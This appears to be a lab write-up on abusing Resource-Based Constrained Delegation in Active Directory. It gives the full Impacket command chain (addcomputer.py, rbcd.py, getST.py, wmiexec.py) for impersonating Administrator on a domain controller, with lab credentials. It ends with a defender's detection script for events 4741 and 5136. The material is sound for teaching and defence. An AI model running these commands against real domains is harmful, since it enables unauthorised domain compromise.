
# Resource Based Constrained Delegation

* Resource-Based Constrained Delegation (RBCD)
* You can abuse RBCD when you can edit the attribute `msDS-AllowedToActOnBehalfOfOtherIdentity`

#### Resource-Based Constrained Delegation

As added functionality post-Windows Server 2012, Microsoft introduced a finer-grained delegation method called “Resource-Based Constrained Delegation.” It allows delegation settings to be configured on the target service/resource instead of on the user account (interactive account). It is implemented by the “**msDS-AllowedToActOnBehalfOfOtherIdentity**” attribute on a target computer object.

This field is available on Windows 8.1+ and Windows Server 2012+, and modifying it does not require domain admin rights.

#### Exploitation Methodology

The exploitation of RBCD is quite easy if you paid attention to the theory above. The following steps are observed:

* Create a fake computer account
* Trigger the legitimate machine account NYC$ to authenticate via RBCD
* The fake computer account acts on behalf of the Domain Controller (NYC$) account
* Generate the fake machine account’s hash
* Obtain a Service Ticket
* An example of exploitation is when you have a GenericAll or GenericWrite ACL on a computer.
* You can find this in the lab when you look at the ACLs on users.
* We can see that diego.montenegro has GenericWrite on NYC.
* The RBCD exploitation is carried out with the following commands:
* Create a computer X (rbcd$)

We are using diego's password, which we changed here:

[Generic All on user: centralpark > diego.montenegro](/attacking-active-directory/user-acl-exploits/generic-all-on-user-centralpark-greater-than-diego.montenegro.md)

```
addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host nyc.newyork.local 'newyork.local/diego.montenegro:letsdothis'
```

<figure><img src="/files/SVYZPvvRDiCK8Wyym3af" alt=""><figcaption></figcaption></figure>

* Write the delegation entry on our target, delegating from X (rbcd$)

```
rbcd.py -delegate-from 'rbcd$' -delegate-to 'NYC$' -dc-ip 'nyc.newyork.local' -action 'write' newyork.local/diego.montenegro:letsdothis
```

<figure><img src="/files/NVzyCxHGeL2G1GxR48lT" alt=""><figcaption></figcaption></figure>

* Now that X (rbcd$) has delegation permission on our target, you can do an S4U2Self request followed by an S4U2Proxy request.
* This results in administrator permissions on NYC.

```
getST.py -spn 'cifs/nyc.newyork.local' -impersonate Administrator -dc-ip 'nyc.newyork.local' 'newyork.local/rbcd$:rbcdpass'

export KRB5CCNAME=/workspace/rbcd/Administrator@cifs_nyc.newyork.local@NEWYORK.LOCAL.ccache
wmiexec.py -k -no-pass @nyc.newyork.local
```

<figure><img src="/files/4MhtGtH6d36GgHYNGOsO" alt=""><figcaption></figcaption></figure>

* After the exploit, clean up the lab: flush the RBCD entry and delete the computer account with a domain admin account:

```
rbcd.py -delegate-from 'rbcd$' -delegate-to 'nyc$' -dc-ip 'nyc.newyork.local' -action 'flush' newyork.local/diego.Montenegro:letsdothis
addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host nyc.newyork.local 'newyork.local/mateo.Pacheco:elsenorpacheco' -delete
```
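
From the defender's side, the two directory changes in the steps above (a new computer account, then a value written to `msDS-AllowedToActOnBehalfOfOtherIdentity` on the target) appear as Security events 4741 and 5136 on the domain controller. The following detection logic is an added example, not part of the original page; the sample events, timestamps, DNs, the `helpdesk` user and the 24-hour correlation window are constructed assumptions.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
VALUE_ADDED = "%%14674"        # 5136 OperationType for "Value Added"
WINDOW = timedelta(hours=24)   # assumed correlation window

# Constructed sample events; keys mirror the 4741 / 5136 event data fields.
EVENTS = [
    {"id": 4741, "time": "2024-05-01T10:02:11",
     "SubjectUserName": "diego.montenegro", "TargetUserName": "rbcd$"},
    {"id": 5136, "time": "2024-05-01T10:03:40",
     "SubjectUserName": "diego.montenegro",
     "ObjectDN": "CN=NYC,OU=Domain Controllers,DC=newyork,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": VALUE_ADDED},
    {"id": 5136, "time": "2024-05-01T11:00:00", "SubjectUserName": "helpdesk",
     "ObjectDN": "CN=WS01,CN=Computers,DC=newyork,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
]


def find_rbcd_writes(events, window=WINDOW):
    """Alert on every value added to the RBCD attribute; raise severity when
    the same subject created a computer account within `window` beforehand."""
    created = {}  # subject -> [(creation time, new computer name)]
    alerts = []
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["time"])):
        when = datetime.fromisoformat(ev["time"])
        subject = ev["SubjectUserName"].lower()
        if ev["id"] == 4741:
            created.setdefault(subject, []).append((when, ev["TargetUserName"]))
        elif (ev["id"] == 5136
              and ev.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTR
              and ev.get("OperationType") == VALUE_ADDED):
            recent = [n for t, n in created.get(subject, []) if when - t <= window]
            alerts.append({"time": ev["time"], "subject": subject,
                           "target": ev["ObjectDN"], "new_computers": recent,
                           "severity": "high" if recent else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in find_rbcd_writes(EVENTS):
        print(alert)
```

Event 5136 is only logged when directory service change auditing is enabled and the object's SACL covers the write, so confirm both before relying on this check.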
